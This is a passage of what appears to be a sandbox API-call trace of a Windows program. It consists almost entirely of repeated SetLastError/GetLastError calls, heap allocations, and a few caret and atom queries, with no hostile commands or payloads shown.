0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.117] SetLastError (dwErrCode=0x0) [0050.117] GetLastError () returned 0x0 [0050.118] SetLastError (dwErrCode=0x0) [0050.118] GetLastError () returned 0x0 [0050.118] SetLastError (dwErrCode=0x0) [0050.118] GetLastError () returned 0x0 [0050.118] SetLastError (dwErrCode=0x0) [0050.118] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.125] SetLastError (dwErrCode=0x0) [0050.125] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.126] SetLastError (dwErrCode=0x0) [0050.126] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.127] SetLastError (dwErrCode=0x0) [0050.127] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x0, Size=0x75) returned 0x1d61990 [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.128] GetLastError () returned 0x0 [0050.128] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.129] GetLastError () returned 0x0 [0050.129] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.130] GetLastError () returned 0x0 [0050.130] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.131] SetLastError (dwErrCode=0x0) [0050.131] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.132] SetLastError (dwErrCode=0x0) [0050.132] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.133] GetLastError () returned 0x0 [0050.133] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.134] SetLastError (dwErrCode=0x0) [0050.134] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.135] GetLastError () returned 0x0 [0050.135] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.136] SetLastError (dwErrCode=0x0) [0050.136] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.137] GetLastError () returned 0x0 [0050.137] SetLastError (dwErrCode=0x0) [0050.138] GetLastError () returned 0x0 [0050.138] SetLastError (dwErrCode=0x0) [0050.138] GetLastError () returned 0x0 [0050.138] SetLastError (dwErrCode=0x0) [0050.138] GetLastError () returned 0x0 [0050.138] SetLastError (dwErrCode=0x0) [0050.138] GetLastError () returned 0x0 [0050.138] SetLastError (dwErrCode=0x0) [0050.138] GetLastError () returned 0x0 [0050.138] SetLastError (dwErrCode=0x0) [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x98) returned 0x1d61a10 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1f) returned 0x1d61ab0 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x36) returned 0x1d61ad8 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x37) returned 0x1d61b18 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x3c) returned 0x1d61b58 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x31) returned 0x1d61ba0 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x17) returned 0x1d61be0 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x24) returned 0x1d61c00 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x14) returned 0x1d61c30 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0xd) returned 0x1d61c50 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x25) returned 0x1d61c68 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x39) returned 0x1d61c98 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x18) returned 0x1d61ce0 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x17) returned 0x1d61d00 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0xe) returned 0x1d61d20 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x69) returned 0x1d61d38 [0050.138] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x3e) returned 0x1d61db0 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1b) returned 0x1d61df8 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1d) returned 0x1d61e20 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x48) returned 0x1d61e48 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x12) returned 0x1d61e98 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x18) returned 0x1d61eb8 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1b) returned 0x1d61ed8 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x24) returned 0x1d61f00 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x29) returned 0x1d61f30 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1e) returned 0x1d61f68 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x41) returned 0x1d61f90 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x17) returned 0x1d61fe8 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0xf) returned 0x1d62008 [0050.139] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x16) returned 0x1d62020 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x2a) returned 0x1d62040 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x29) returned 0x1d62078 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x15) returned 0x1d620b0 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x1e) returned 0x1d620d0 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x2a) returned 0x1d620f8 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x12) returned 0x1d62130 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x18) returned 0x1d62150 [0050.140] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x46) returned 0x1d62170 [0050.140] HeapFree (in: hHeap=0x1d60000, dwFlags=0x0, lpMem=0x1d611f8 | out: hHeap=0x1d60000) returned 1 [0050.141] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x800) returned 0x1d621c0 [0050.141] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0050.141] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0050.141] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x80) returned 0x1d611f8 [0050.141] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40467c) returned 0x0 [0050.142] RtlSizeHeap (HeapHandle=0x1d60000, Flags=0x0, MemoryPointer=0x1d611f8) returned 0x80 [0050.142] GetLastError () returned 0x0 [0050.142] SetLastError (dwErrCode=0x0) [0050.142] GetLastError () returned 0x0 [0050.142] SetLastError (dwErrCode=0x0) [0050.142] GetLastError () returned 0x0 [0050.142] SetLastError (dwErrCode=0x0) [0050.142] GetLastError () returned 0x0 [0050.142] SetLastError (dwErrCode=0x0) [0050.143] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.144] SetLastError (dwErrCode=0x0) [0050.144] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.145] SetLastError (dwErrCode=0x0) [0050.145] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.146] SetLastError (dwErrCode=0x0) [0050.146] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.151] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.152] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.153] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.154] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.155] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.156] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.157] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.158] GetLastError () returned 0x0 [0050.486] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.486] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0050.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0050.486] GetCaretPos (in: lpPoint=0x18ee64 | out: 